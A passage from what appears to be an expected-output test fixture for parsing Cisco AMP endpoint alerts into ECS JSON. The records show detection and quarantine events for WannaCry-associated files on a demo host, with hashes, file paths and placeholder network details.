"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "hash": { + "sha1": "47a9ad4125b6bd7c55e4e7da251e23f089407b8f", + "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "md5": "4fef5e34143e646dbf9907c4374276f5" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "4fef5e34143e646dbf9907c4374276f5", + "47a9ad4125b6bd7c55e4e7da251e23f089407b8f" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843639044Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303569945526000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": 
"W32.4A468603FD.04426d77.auto.Talos", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303569945526289", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843642931Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419303569945526000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419303565650558981", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": 
"2021-09-12T17:31:29.843644903Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419303569945526000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419303565650558977", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": 
"2021-01-14T19:29:09.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843646784Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558984", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843648712Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558983", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 7144, + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "@timestamp": 
"2021-01-14T19:29:09.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843650655Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558982", + "event_type_id": 1090519054 + } + }, + "tags": 
[ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 7144, + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "@timestamp": "2021-01-14T19:29:09.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843652586Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558981", + "event_type_id": 1090519054 + } + }, + "tags": 
[ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843654448Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303565650559000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303565650558980", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + 
"user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843656334Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2